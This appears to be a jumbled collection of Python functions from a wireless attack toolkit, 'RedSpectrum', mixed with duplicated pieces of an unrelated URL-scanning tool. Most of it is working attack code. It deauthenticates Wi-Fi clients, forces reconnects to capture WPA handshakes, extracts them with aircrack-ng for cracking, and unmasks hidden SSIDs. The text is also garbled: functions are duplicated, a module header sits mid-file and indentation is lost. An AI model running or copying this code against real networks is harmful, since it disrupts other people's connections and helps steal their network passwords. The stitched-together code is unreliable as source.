def getHandshakes(target_bssid,target_ssids,ListenInterface,AttackInterface,verbose=True):
handshakes = []
tested = []
cleanAPs = clean_AP_data(APs)
for bssid,essid,channel,privacy,authentication,AP_date in cleanAPs:
if target_bssid and (not target_bssid.lower() in bssid.lower()): continue
if (essid and '\\x00' not in essid and essid not in handshakes) and ((target_ssids and essid.lower() in target_ssids) or (not target_ssids)):
cleanStations = clean_station_data(stations)
for station_mac,connected_bssid,station_date in cleanStations:
if (bssid == connected_bssid and channel != '-1') and (essid not in handshakes) and ((bssid,station_mac) not in tested):
outFileName = "%s_%s_%s" % (''.join([c for c in essid.lower() if c in ascii_lowercase or c in digits]),bssid,channel)
(ACK,(ListenInterface,AttackInterface)) = deauth(bssid,channel,station_mac,MAX_CLIENT_DEAUTH,outFileName,ListenInterface,AttackInterface,verbose)
outFileNames,outCAPFile = find_output_files(outFileName,'.cap')
handshakeFile = 'W00T-'+outCAPFile.replace('.cap','')
extractHandshake = "aircrack-ng %s -J %s" % (outCAPFile,handshakeFile)
stdout, stderr = run_process(extractHandshake,MAX_PROC_WAIT)
if (ACK >= MIN_ACKs) and not ("Successfully written to %s" % handshakeFile+'.hccap' in stdout):
if verbose: print_warning("Too many deauthentication packets sent to \"%s\", the station's wireless card is having issues reconnecting... Try running this script against \"%s / %s\" later..." % (station_mac,essid,bssid))
elif "Successfully written to %s" % handshakeFile+'.hccap' in stdout:
newOutCAPFile = "W00T-"+outCAPFile
os.rename(outCAPFile,newOutCAPFile)
if verbose: print_success("Handshake captured for the \"%s\" SSID! Output written to \"%s\" and \"%s\"" % (essid,newOutCAPFile,handshakeFile+'.hccap'))
handshakes.append(essid)
for outFile in outFileNames:
try:
os.remove(outFile)
except:
pass
tested.append((bssid,station_mac))
else:
pass
if not tested:
if verbose: print_error("No clients are connected to target SSID(s) and/or BSSID...")
return handshakes
def urllist(config):
"""
Builds arguments to handle_url as tuples for starmap()
This is a generator, wrapping another generator...
(config,url)
"""
if config['source'] == 'hosts':
for host in hostlist(config['hosts']):
for proto in 'http','https':
for port in config[proto]:
url = "%s://%s:%s/" % (proto,host,port)
yield (config,url)
elif config['source'] == 'urls':
for url in config['hosts']:
yield (config,url)
elif config['source'] == 'url-file':
for urlfile in config['hosts']:
if urlfile == '-':
fp = sys.stdin
else:
try:
fp = open(urlfile)
except (IOError):
print_error("Unable to open %s as url list file." % urlfile)
continue
for line in fp:
yield(config,line.strip())
def urllist(config):
"""
Builds arguments to handle_url as tuples for starmap()
This is a generator, wrapping another generator...
(config,url)
"""
if config['source'] == 'hosts':
for host in hostlist(config['hosts']):
for proto in 'http', 'https':
for port in config[proto]:
url = "%s://%s:%s/" % (proto, host, port)
yield (config, url)
elif config['source'] == 'urls':
for url in config['hosts']:
yield (config, url)
elif config['source'] == 'url-file':
for urlfile in config['hosts']:
if urlfile == '-':
fp = sys.stdin
else:
try:
fp = open(urlfile)
except (IOError):
print_error("Unable to open %s as url list file." %
urlfile)
continue
for line in fp:
yield (config, line.strip())
def openfp(self,fname):
"""Open the output file for writing"""
if not fname or fname == '-':
self.fp = sys.stdout
else:
try:
self.fp = open(fname,"w")
except (IOError):
print_error("Unable to open file for output:" % fname)
raise
def split_CSVs(inputFiles=[],
APFileName=AP_FILE_NAME,
stationFileName=STATION_FILE_NAME):
APs = []
stations = []
try:
if not inputFiles:
csvFiles = [
file for file in os.listdir('.')
if file.endswith('.csv') and not 'kismet' in file
and file != AP_FILE_NAME and file != STATION_FILE_NAME
]
else:
csvFiles = inputFiles
if not csvFiles:
raise Exception("No CSV files found in the CWD...")
for csvFile in csvFiles:
csvFileObject = open(csvFile)
csvContent = csvFileObject.read()
csvContent = csvContent.split('\r\n\r\n')
for line in csvContent[0].split('\n'):
if len(
line
) > 1 and not "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication" in line:
APs.append(line)
for line in csvContent[1].split('\n'):
if len(
line
) > 1 and not "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs" in line:
stations.append(line)
csvFileObject.close()
APs = "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\n" + '\n'.join(
APs)
stations = "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs\n" + '\n'.join(
stations)
open(APFileName, 'w').write(APs)
open(stationFileName, 'w').write(stations)
except:
print_error(
"You must run this from a directory containing Airodump-ng CSV output files and ensure you don't have any other CSV files in the CWD... Exiting..."
)
sys.exit(1)
return APFileName, stationFileName
def deauthAttack(target_bssid,
target_ssids,
target_station,
ListenInterface,
AttackInterface,
verbose=True):
tested = []
cleanAPs = clean_AP_data(APs)
for bssid, essid, channel, privacy, authentication, AP_date in cleanAPs:
if target_bssid and (not target_bssid.lower() in bssid.lower()):
continue
if (essid and '\\x00' not in essid) and (
(target_ssids and essid.lower() in target_ssids) or
(not target_ssids)):
cleanStations = clean_station_data(stations)
for station_mac, connected_bssid, station_date in cleanStations:
if not target_station: target_station = ''
if (bssid == connected_bssid and channel != '-1') and (
(bssid, station_mac) not in tested) and (
(target_station
and target_station.lower() in station_mac.lower()) or
(not target_station)):
outFileName = "%s_%s" % (bssid, channel)
(ACK, (ListenInterface, AttackInterface)) = deauth(
bssid, channel, station_mac, MAX_CLIENT_DEAUTH,
outFileName, ListenInterface, AttackInterface, verbose)
outFileNames, notRequired = find_output_files(
outFileName, '')
for outFile in outFileNames:
try:
os.remove(outFile)
except:
pass
tested.append((bssid, station_mac))
else:
pass
if not tested:
if verbose:
print_error(
"No clients are connected to target SSID(s) and/or BSSID...")
return tested
def go(config):
"""Main function to handle execution"""
# Dynamically load the configured rules
ruleset = []
for r in config['rules'].iterkeys():
try:
rule = rules.loadRule(r)
ruleset.append((rule(config), config['rules'][r]))
except (ImportError, AttributeError):
print_error("ERROR: Unable to import rule %s!" % r)
pass
config['ruleset'] = ruleset
# Get outputs
outputs = output.getOutputs(config['output'])
# Build the eventlet pool and fire off processing
pool = eventlet.GreenPool(config['conns'])
res = pool.starmap(net.handle_url, urllist(config))
# Sort results and print data
res = sorted(filter(None, res), key=lambda val: val[1], reverse=True)
for o in outputs:
o.writeall(res)
def go(config):
"""Main function to handle execution"""
# Dynamically load the configured rules
ruleset = []
for r in config['rules'].iterkeys():
try:
rule = rules.loadRule(r)
ruleset.append((rule(config),config['rules'][r]))
except (ImportError,AttributeError):
print_error("ERROR: Unable to import rule %s!" % r)
pass
config['ruleset'] = ruleset
# Get outputs
outputs = output.getOutputs(config['output'])
# Build the eventlet pool and fire off processing
pool = eventlet.GreenPool(config['conns'])
res = pool.starmap(net.handle_url,urllist(config))
# Sort results and print data
res = sorted(filter(None,res),key=lambda val: val[1],reverse=True)
for o in outputs:
o.writeall(res)
def findHiddenNetworks(target_bssid,
target_ssids,
ListenInterface,
AttackInterface,
verbose=True):
discovered = []
tested = []
cleanAPs = clean_AP_data(APs)
for bssid, essid, channel, privacy, authentication, AP_date in cleanAPs:
if target_bssid and (not target_bssid.lower() in bssid.lower()):
continue
if '\\x00' in essid or not essid:
cleanStations = clean_station_data(stations)
for station_mac, connected_bssid, station_date in cleanStations:
if (bssid == connected_bssid and channel != '-1') and (
not (bssid, station_mac) in tested) and (
not bssid in [d[0] for d in discovered]):
invalidTargetUnmasked = False
numOfDiscovered = len(discovered)
outFileName = "HIDDEN_%s_%s" % (bssid, channel)
(ACK, (ListenInterface, AttackInterface)) = deauth(
bssid, channel, station_mac, MAX_CLIENT_DEAUTH,
outFileName, ListenInterface, AttackInterface, verbose)
outFileNames, outCSVFile = find_output_files(
outFileName, '.csv')
APFileName = 'APs_' + outFileName + '.csv'
stationFileName = 'stations_' + outFileName + '.csv'
split_CSVs(inputFiles=[outCSVFile],
APFileName=APFileName,
stationFileName=stationFileName)
discoveredAPs = parse_APs(APFileName)
cleanDiscoveredAPs = clean_AP_data(discoveredAPs)
for dis_bssid, dis_essid, dis_channel, dis_privacy, dis_authentication, dis_AP_date in cleanDiscoveredAPs:
if (dis_essid and not '\\x00' in dis_essid) and (
not target_ssids
or dis_essid.lower() in target_ssids):
newOutCSVFile = outCSVFile.replace(
"HIDDEN_", "W00T-UNHIDDEN_%s_" %
'+'.join(dis_essid.split()))
os.rename(outCSVFile, newOutCSVFile)
if verbose:
print_success(
"\"%s\" discovered! Output written to \"%s\""
% (dis_essid, newOutCSVFile))
discovered.append((bssid, dis_essid))
if (dis_essid and not '\\x00' in dis_essid) and (
target_ssids
and not dis_essid.lower() in target_ssids):
invalidTargetUnmasked = True
print_warning(
"\"%s\" was discovered, but output was not stored..."
% dis_essid)
if (ACK >= MIN_ACKs) and (
len(discovered)
== numOfDiscovered) and not invalidTargetUnmasked:
if verbose:
print_warning(
"Too many deauthentication packets sent to \"%s\", the station's wireless card is having issues reconnecting... Try running this script against \"%s\" later..."
% (station_mac, bssid))
for outputFile in outFileNames:
try:
os.remove(outputFile)
except:
pass
os.remove(APFileName)
os.remove(stationFileName)
tested.append((bssid, station_mac))
else:
pass
if not tested:
if verbose:
print_error(
"No clients are connected to target SSID(s) and/or BSSID...")
return discovered
#!/usr/bin/python
"""
RedSpectrum - parse_airodump.py
April 1, 2017
Leopold von Niebelschuetz-Godlewski
Looks in the CWD for Airodump-ng .csv output files, and prints two tables containing wireless reconnaissance details.
"""
import argparse, csv, os, sys
from core import print_error, print_warning, print_success
try:
from prettytable import PrettyTable
except:
print_error("You must install PrettyTable module first... Exiting...")
sys.exit(1)
AP_FILE_NAME = "APs.csv"
STATION_FILE_NAME = "stations.csv"
def parse_APs(fileName=AP_FILE_NAME):
APs = []
with open(fileName) as csvFile:
reader = csv.DictReader(csvFile)
for row in reader:
if row['BSSID'] != "00:00:00:00:00:00":
APs.append((row['BSSID'].strip(), row[' ESSID'].strip(),
row[' channel'].strip(), row[' Privacy'].strip(),
row[' Authentication'].strip(),
row[' Last time seen'].strip().split()[0]))
return APs
